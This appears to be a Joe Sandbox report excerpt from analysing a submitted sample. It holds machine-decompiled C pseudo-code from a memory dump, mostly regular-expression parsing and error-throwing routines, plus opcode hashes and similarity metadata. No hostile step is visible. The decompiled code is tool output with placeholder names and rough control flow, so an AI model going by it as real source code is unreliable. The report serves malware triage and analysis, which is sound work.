                                                    				if( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))) != 0) {
                                                    					_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))))) + 0x2c))(_t73 - 0x14, _t64);
                                                    					_t38 =  *((intOrPtr*)(_t73 + 8));
                                                    					 *_t38 =  *_t49;
                                                    					_t50 =  *((intOrPtr*)(_t49 + 4));
                                                    				} else {
                                                    					_t38 =  *((intOrPtr*)(_t73 + 8));
                                                    					_t52 =  *0x417690; // 0x0
                                                    					 *_t38 = _t52;
                                                    					_t50 =  *0x417694; // 0xffffffff
                                                    				}
                                                    				 *((intOrPtr*)(_t38 + 4)) = _t50;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
                                                    				return _t38;
                                                    			}





















                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: reference to nonexistent group
                                                    • API String ID: 1214428233-2717939947
                                                    • Opcode ID: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
                                                    • Instruction ID: 522e6e50840da4ac399b5e0b3b8a6ae22c3212176d366e94a0c7a72128cb66c6
                                                    • Opcode Fuzzy Hash: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
                                                    • Instruction Fuzzy Hash: 4E31D135A00114CFC710DF48C544ADABBF5FF89300B24C0AAE81AAB361C774ED46CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 34%
                                                    			E0040DB46(intOrPtr __ecx, void* __eflags) {
                                                    				char* _t25;
                                                    				intOrPtr* _t26;
                                                    				intOrPtr _t33;
                                                    				char* _t34;
                                                    				intOrPtr _t39;
                                                    				char* _t44;
                                                    				char* _t46;
                                                    				void* _t48;
                                                    				intOrPtr _t51;
                                                    				void* _t53;
                                                    
                                                    				L004153D0();
                                                    				_push(__ecx);
                                                    				_t33 =  *((intOrPtr*)(_t53 + 0xc));
                                                    				_t46 =  *((intOrPtr*)(_t53 + 8));
                                                    				_t51 = __ecx;
                                                    				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
                                                    				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
                                                    				 *((intOrPtr*)(__ecx + 8)) = _t46;
                                                    				 *((intOrPtr*)(__ecx + 0xc)) = _t33;
                                                    				 *((intOrPtr*)(__ecx + 0x10)) = _t33 - _t46;
                                                    				 *((intOrPtr*)(__ecx)) = 0x418524;
                                                    				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
                                                    				 *((intOrPtr*)(_t53 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10))));
                                                    				 *(_t53 - 4) = 1;
                                                    				_t25 = E0040507F( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10)))), _t33 - _t46);
                                                    				_t39 =  *((intOrPtr*)(__ecx + 0xc));
                                                    				 *((intOrPtr*)(__ecx + 0x14)) = _t25;
                                                    				_t44 = _t25;
                                                    				_t26 =  *((intOrPtr*)(__ecx + 8));
                                                    				 *((intOrPtr*)(__ecx)) = 0x4184f0;
                                                    				 *((intOrPtr*)(_t53 + 8)) = _t39;
                                                    				if(_t26 != _t39) {
                                                    					do {
                                                    						 *_t44 =  *_t26;
                                                    						_t44 = _t44 + 1;
                                                    						_t26 = _t26 + 1;
                                                    					} while (_t26 !=  *((intOrPtr*)(_t53 + 8)));
                                                    				}
                                                    				if(_t33 != _t46) {
                                                    					do {
                                                    						 *_t46 =  *0x4172a4( *_t46);
                                                    						_t46 = _t46 + 1;
                                                    					} while (_t46 != _t33);
                                                    				}
                                                    				_t34 =  *((intOrPtr*)(_t51 + 0x14));
                                                    				_t48 =  *((intOrPtr*)(_t51 + 0x10)) + _t34;
                                                    				if(_t48 != _t34) {
                                                    					do {
                                                    						 *_t34 =  *0x4172ac( *_t34);
                                                    						_t34 = _t34 + 1;
                                                    					} while (_t34 != _t48);
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                                                    				return _t51;
                                                    			}














                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: H_prologtolowertoupper
                                                    • String ID: q@
                                                    • API String ID: 3817453147-2764676539
                                                    • Opcode ID: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
                                                    • Instruction ID: 1cd1e5bdde56281f47441b0658e7e07e847f1fa8a3c8823e6e5bb0bf60c20c5d
                                                    • Opcode Fuzzy Hash: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
                                                    • Instruction Fuzzy Hash: 4321C271A007418FCB20CF59C48065AFBF5EF48311B14856FE496D7741C778A844CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: sub-expression cannot be quantified
                                                    • API String ID: 1214428233-703565053
                                                    • Opcode ID: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
                                                    • Instruction ID: 2ce7878e2e45b983fac23937024426c5bb2166d395f322666b5fa2fe93735dc8
                                                    • Opcode Fuzzy Hash: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
                                                    • Instruction Fuzzy Hash: 2A11C231845114AFCB10DF94DC44EEEBB78FF48350F10849EF862A7260DBB85945CB6A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 17%
                                                    			E00409027(void* __esi) {
                                                    				signed int _v4;
                                                    				char _v13;
                                                    				char _v32;
                                                    				char _v60;
                                                    				intOrPtr _v64;
                                                    				intOrPtr _v68;
                                                    				char* _t28;
                                                    
                                                    				L004153D0();
                                                    				_v32 = _v13;
                                                    				 *0x417230(0, __esi);
                                                    				_t28 = "recursion sub-expression cannot be quantified";
                                                    				 *0x417234(_t28, strlen(_t28));
                                                    				_v4 = _v4 & 0x00000000;
                                                    				 *0x417218( &_v32);
                                                    				_push(0x4196f8);
                                                    				_push( &_v60);
                                                    				_v60 = 0x417698;
                                                    				L004153FE();
                                                    				_push(_v64);
                                                    				return E0040A9C0( &_v60, _v68, _v64);
                                                    			}










                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: recursion sub-expression cannot be quantified
                                                    • API String ID: 1214428233-1191606697
                                                    • Opcode ID: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
                                                    • Instruction ID: 10e607d7a6f2a3e9ba9a672d8d2b0ae7a902c0b6b7616f674ba24b2d4bce1438
                                                    • Opcode Fuzzy Hash: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
                                                    • Instruction Fuzzy Hash: 9FF0813684111CFBCF00AB95EC45ADD7B38FF08350F008056F815A6061DBB84644CBB9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 21%
                                                    			E004133FE() {
                                                    				intOrPtr _t15;
                                                    				void* _t27;
                                                    				char* _t28;
                                                    				void* _t30;
                                                    
                                                    				L004153D0();
                                                    				_t15 =  *((intOrPtr*)(_t30 + 0xc));
                                                    				if(_t15 ==  *((intOrPtr*)(_t30 + 8))) {
                                                    					 *((char*)(_t30 - 0x1c)) =  *((intOrPtr*)(_t30 + 0xf));
                                                    					 *0x417230(0, _t27);
                                                    					_t28 = "expecting end of character set";
                                                    					 *0x417234(_t28, strlen(_t28));
                                                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                    					 *0x417218(_t30 - 0x1c);
                                                    					_t15 = _t30 - 0x38;
                                                    					_push(0x4196f8);
                                                    					_push(_t15);
                                                    					 *((intOrPtr*)(_t30 - 0x38)) = 0x417698;
                                                    					L004153FE();
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                                    				return _t15;
                                                    			}







                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: expecting end of character set
                                                    • API String ID: 1214428233-2681132798
                                                    • Opcode ID: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
                                                    • Instruction ID: fb0b6af9fdd803d394df8d1c0f25a948e4417c071c105f155f0c22cdd341b05e
                                                    • Opcode Fuzzy Hash: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
                                                    • Instruction Fuzzy Hash: 49014471C41109EFCB01EF94E885BED7B78EF04755F108056F822D7151DBB85685CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 16%
                                                    			E004073CC() {
                                                    				void* _t24;
                                                    				char* _t25;
                                                    				void* _t27;
                                                    
                                                    				L004153D0();
                                                    				 *((char*)(_t27 - 0x20)) =  *((intOrPtr*)(_t27 - 0xd));
                                                    				 *0x417230(0, _t24);
                                                    				_t25 = "look-ahead assertion cannot be quantified";
                                                    				 *0x417234(_t25, strlen(_t25));
                                                    				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
                                                    				 *0x417218(_t27 - 0x20);
                                                    				_push(0x4196f8);
                                                    				_push(_t27 - 0x3c);
                                                    				 *((intOrPtr*)(_t27 - 0x3c)) = 0x417698;
                                                    				L004153FE();
                                                    				return 1;
                                                    			}






                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: look-ahead assertion cannot be quantified
                                                    • API String ID: 1214428233-1240756859
                                                    • Opcode ID: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
                                                    • Instruction ID: 1721b6b3a732f0907001ba31f53c3af67a5e291595c0cbf9be71024513a692cd
                                                    • Opcode Fuzzy Hash: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
                                                    • Instruction Fuzzy Hash: E2F03035851118ABCB04AB94EC55ADD7B78BF59351F404096F821A2161DFB80549CBBA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: invalid vector<T> subscript
                                                    • API String ID: 1214428233-3016609489
                                                    • Opcode ID: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
                                                    • Instruction ID: 7f0d4b690d67eaef1822860b9d25e2d5405d004bbf420f7a3b0005bfa06bd269
                                                    • Opcode Fuzzy Hash: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
                                                    • Instruction Fuzzy Hash: E5F03076C45118ABDB04EBE4EC49AED7B78FF18350F0040A6F811A3161DFB85545CBB9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID: tolowertoupper
                                                    • String ID:
                                                    • API String ID: 1080271956-0
                                                    • Opcode ID: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
                                                    • Instruction ID: 36f9c2d77fe6c67efd501578e7725a05c9af3bd086344374b91f15e4db579863
                                                    • Opcode Fuzzy Hash: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
                                                    • Instruction Fuzzy Hash: 07A14D71A04205DFCB14CF64C9846AEBFB8BF08316F1481AAE855A7391C778EA45CF99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 71%
                                                    			E0041346F(intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                    				void* __ebp;
                                                    				intOrPtr* _t11;
                                                    				intOrPtr* _t24;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t27;
                                                    				intOrPtr* _t29;
                                                    				signed char _t33;
                                                    				signed char _t37;
                                                    				signed char _t40;
                                                    				void* _t41;
                                                    				void* _t42;
                                                    				void* _t44;
                                                    				void* _t46;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t56;
                                                    				intOrPtr* _t57;
                                                    				void* _t58;
                                                    				void* _t59;
                                                    
                                                    				_t57 = _a4;
                                                    				_t56 = _a8;
                                                    				_push(_t56);
                                                    				_push( *_t57);
                                                    				E004133FE();
                                                    				_t11 =  *_t57;
                                                    				_t33 =  *_t11;
                                                    				_t40 = _t33;
                                                    				_t59 = _t40 - 0x66;
                                                    				if(_t59 > 0) {
                                                    					_t41 = _t40 - 0x6e;
                                                    					if(_t41 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 0xa;
                                                    						}
                                                    						L39:
                                                    						 *_t57 = _t11 + 1;
                                                    						L40:
                                                    						return _t33;
                                                    					}
                                                    					_t42 = _t41 - 4;
                                                    					if(_t42 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 0xd;
                                                    						}
                                                    						goto L39;
                                                    					}
                                                    					_t44 = _t42;
                                                    					if(_t44 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 9;
                                                    						}
                                                    						goto L39;
                                                    					}
                                                    					_t46 = _t44;
                                                    					if(_t46 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 0xb;
                                                    						}
                                                    						goto L39;
                                                    					}
                                                    					if(_t46 != 0) {
                                                    						goto L39;
                                                    					}
                                                    					_t33 = 0;
                                                    					 *_t57 = _t11 + 1;
                                                    					while(E00402F9A( *((intOrPtr*)( *_t57))) != 0) {
                                                    						_t33 = (_t33 << 4) + E00402FBD( *((intOrPtr*)( *_t57)));
                                                    						 *_t57 =  *_t57 + 1;
                                                    						_push(_t56);
                                                    						_push( *_t57);
                                                    						E004133FE();
                                                    						_t58 = _t58 + 0xc;
                                                    					}
                                                    					goto L40;
                                                    				}
                                                    				if(_t59 == 0) {
                                                    					if(_a12 != 0) {
                                                    						_t33 = 0xc;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 < 0x30) {
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 <= 0x37) {
                                                    					_t33 = _t33 - 0x30;
                                                    					 *_t57 = _t11 + 1;
                                                    					while(1) {
                                                    						_t24 =  *_t57;
                                                    						_t50 =  *_t24;
                                                    						if(_t50 < 0x30 || _t50 > 0x37) {
                                                    							goto L40;
                                                    						}
                                                    						_push(_t56);
                                                    						_t33 = (_t33 - 6 << 3) + _t50;
                                                    						_t25 = _t24 + 1;
                                                    						_push(_t25);
                                                    						 *_t57 = _t25;
                                                    						E004133FE();
                                                    					}
                                                    					goto L40;
                                                    				}
                                                    				if(_t40 == 0x5c) {
                                                    					if(_a12 != 0) {
                                                    						_t33 = 0x5c;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 == 0x61) {
                                                    					if(_a12 != 0) {
                                                    						_t33 = 7;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 == 0x63) {
                                                    					_t27 = _t11 + 1;
                                                    					_push(_t56);
                                                    					_push(_t27);
                                                    					 *_t57 = _t27;
                                                    					E004133FE();
                                                    					_t29 =  *_t57;
                                                    					_t37 =  *_t29;
                                                    					 *_t57 = _t29 + 1;
                                                    					if(_t37 >= 0x61 && _t37 <= 0x7a) {
                                                    						_t37 =  *0x4172a4(_t37);
                                                    					}
                                                    					_t33 = _t37 ^ 0x00000040;
                                                    					goto L40;
                                                    				} else {
                                                    					if(_t40 == 0x65) {
                                                    						_t33 = 0x1b;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    			}






















                                                    APIs
                                                      • Part of subcall function 004133FE: _EH_prolog.MSVCRT ref: 00413403
                                                      • Part of subcall function 004133FE: strlen.MSVCRT ref: 0041342B
                                                      • Part of subcall function 004133FE: _CxxThrowException.MSVCRT(?,004196F8), ref: 0041345D
                                                    • toupper.MSVCRT ref: 004134E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlentoupper
                                                    • String ID: a$z
                                                    • API String ID: 957254526-4151050625
                                                    • Opcode ID: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
                                                    • Instruction ID: b1aff326a2e06e5aad8b1cf850e00f7449f94b63455ed0c48128afb1fd7a013c
                                                    • Opcode Fuzzy Hash: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
                                                    • Instruction Fuzzy Hash: F341B6715451817EEB294E2884197FA3BDE9B17F0AF2C041FE4C587A92C66C4BC1C70E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E004023AE(intOrPtr __ecx) {
                                                    				void* _t22;
                                                    				char* _t23;
                                                    				void* _t25;
                                                    				void* _t28;
                                                    
                                                    				L004153D0();
                                                    				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
                                                    				 *((char*)(__ecx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8))));
                                                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                                                    				 *((intOrPtr*)(__ecx + 0xc)) = 0;
                                                    				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                    				 *((intOrPtr*)(__ecx)) = 0x417664;
                                                    				_t23 = __ecx + 0x18;
                                                    				 *((intOrPtr*)(_t28 - 4)) = 0;
                                                    				 *_t23 =  *((intOrPtr*)(_t28 + 0xb));
                                                    				 *0x417230(0, _t22, _t25, __ecx);
                                                    				 *((intOrPtr*)(__ecx + 0x28)) = _t23;
                                                    				 *((intOrPtr*)(__ecx)) = 0x41766c;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
                                                    				return __ecx;
                                                    			}








                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: >$@$v$@
                                                    • API String ID: 3519838083-1508283045
                                                    • Opcode ID: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
                                                    • Instruction ID: 2a2c642b6552ba3d24064c73d9aa280cfc44eb8d4c0d781014b5c2aac6b69bdf
                                                    • Opcode Fuzzy Hash: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
                                                    • Instruction Fuzzy Hash: 84F032B1A04B819FC720CF6D84406DAFBF4AB99710B10896FE09AD3710D3B4A580CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%